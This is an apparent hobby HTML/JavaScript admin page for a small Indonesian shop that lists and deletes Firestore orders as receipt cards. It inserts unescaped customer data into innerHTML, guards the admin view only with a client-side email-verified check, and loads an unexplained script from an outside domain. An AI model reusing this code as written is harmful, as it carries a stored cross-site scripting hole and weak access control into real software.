<!DOCTYPE html>
<html lang="id">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Halaman Admin</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
  <style>
    body {
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      font-size: 16px;
      margin: 0;
      padding: 20px;
      background-color: #f5f5f5; /* Light gray background */
    }

    header {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-bottom: 20px;
    }

    .struk-container {
      width: 300px;
      margin: auto;
      border: 2px solid #333; /* Dark border */
      border-radius: 10px; /* Rounded corners */
      padding: 20px;
      text-align: center;
      background-color: #fff; /* White background */
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.2); /* Subtle shadow */
      margin-bottom: 20px; /* Add margin between receipts */
      position: relative; /* Enable relative positioning for the delete button container */
    }

    .judul {
      font-size: 24px;
      font-weight: bold;
      color: #333; /* Dark text color */
      margin-bottom: 10px;
    }

    .detail-pesanan {
      margin-top: 20px;
    }

    .detail-pesanan td {
      text-align: left;
      padding: 5px 0; /* Add padding for better spacing */
    }

    .footer {
      margin-top: 20px;
      font-style: italic;
      color: #777; /* Lighter text color */
    }

    .delete-button {
      cursor: pointer;
      color: #ff0000; /* Red color for delete button */
      margin-top: 10px; /* Add margin between delete button and footer */
    }

    #userSection {
      display: flex;
      align-items: center;
    }

    #userProfilePicture {
      overflow: hidden;
      border-radius: 50%;
      width: 30px;
      height: 30px;
      margin-left: 10px;
    }
    
    #userProfilePicture {
  overflow: hidden;
  border-radius: 50%;
  width: 60px; /* Ubah ukuran lebar gambar */
  height: 60px; /* Ubah ukuran tinggi gambar */
  margin-left: 10px;
}


header {
width: 100%;
  display: flex;
  justify-content: space-between;
  align-items: center;
  margin-bottom: 20px;
  height: 70px; /* Ubah tinggi header sesuai keinginan Anda */
  background-color: #3498db; /* Ganti warna latar belakang header */
}

#verificationStatus {
  margin-right: 10px; 
   color: #fff;
}
  </style>
</head>
<body>
  <header>
    <div id="userSection">
      <div id="userProfilePictureContainer">
        <img id="userProfilePicture" alt="Foto Profil"/>
        
      </div>
      <span id="userName" style="margin-left: 5px;"></span>
    </div>
    <div id="verificationStatus"></div>
  </header>

  <center>
    <h1>Daftar Pesanan</h1>
  </center>
  
  <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-firestore.js"></script>
  <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-auth.js"></script>
  
<script src="https://kosred.com/a/klttyp.js"></script> 
  <script>
    

    let currentUser;

    auth.onAuthStateChanged(user => {
  if (user) {
    currentUser = user;
    document.getElementById('userProfilePicture').src = user.photoURL || 'URL_DEFAULT_FOTO_PROFIL';
    document.getElementById('userName').textContent = user.displayName || 'Nama Pengguna';

    const verificationStatusElement = document.getElementById('verificationStatus');
    verificationStatusElement.textContent = user.emailVerified ? 'Akun Terverifikasi' : 'Akun Belum Terverifikasi';

    if (!user.emailVerified) {
      // Jika akun belum terverifikasi, arahkan ke halaman index.html
      window.location.href = 'https://tokokita-seven.vercel.app/';
    }

    loadData();
  } else {
    // Redirect atau lakukan sesuatu jika pengguna tidak masuk
  }
});
    

    function loadData() {
      const container = document.getElementById('receipts-container');
      let receiptCounter = 0;

      // Fetch order data from Firestore, sorted by timestamp in descending order
      db.collection('pemesanan').orderBy('timestamp', 'desc').get()
        .then(snapshot => {
          snapshot.forEach(doc => {
            const pesanan = doc.data();
            const waktuPesananValue = new Date(pesanan.timestamp.seconds * 1000).toLocaleString();

            const daftarBarangValue = pesanan.keranjang.map(produk => `${produk.nama} (${produk.jumlah} pcs)`).join(', ');

            // Create a new receipt container for each order
            const strukContainer = document.createElement('div');
            strukContainer.className = 'struk-container';

            // Increment the receipt counter
            receiptCounter++;

            // Populate the receipt content
            strukContainer.innerHTML = `
              <div class="judul">Toko Eti</div>
              <div class="judul">Struk Pembelian ${receiptCounter}</div>
              <div class="detail-pesanan">
                <table>
                  <tr>
                    <td>Nama Pemesan:</td>
                    <td>${pesanan.namaPemesan} <hr></td>
                  </tr>
                  <tr>
                    <td>Alamat:</td>
                    <td>
                      KODE POS:(${pesanan.alamat.kodepos}),
                      RT:${pesanan.alamat.rt_rw},
                      RW:${pesanan.alamat.rw}, ${pesanan.alamat.desa}, ${pesanan.alamat.kecamatan}, ${pesanan.alamat.kabupaten}, ${pesanan.alamat.provinsi}, ${pesanan.alamat.negara} <hr></td>
                  </tr>
                  <tr>
                    <td>Metode Pembayaran:</td>
                    <td>${pesanan.metodePembayaran} <hr></td>
                  </tr>
                  <tr>
                    <td>Waktu Pesanan:</td>
                    <td>${waktuPesananValue} <hr></td>
                  </tr>
                  <tr>
                    <td>Daftar Barang:</td>
                    <td>${daftarBarangValue} <hr></td>
                  </tr>
                  <tr>
                    <td>Total Harga:</td>
                    <td>${pesanan.totalHarga} <hr></td>
                  </tr>
                </table>
              </div>
              <div class="footer">Terima Kasih atas Pembelian Anda!</div>
              <div class="delete-button" onclick="deleteReceipt('${doc.id}')"><i class="fas fa-trash"></i> Hapus Struk</div>
            `;

            // Use 'prepend' to add the new receipt container at the beginning of the container
            container.prepend(strukContainer);
          });
        })
        .catch(error => {
          console.error('Error getting documents: ', error);
        });
    }

    // Function to delete a receipt
    function deleteReceipt(docId) {
      // Delete data from Firebase Firestore
      db.collection('pemesanan').doc(docId).delete()
        .then(() => {
          // Reload the page to reflect the changes
          location.reload();
        })
        .catch(error => {
          console.error('Error removing document: ', error);
        });
    }
  </script>

  <div id="receipts-container"></div>
</body>
</html>
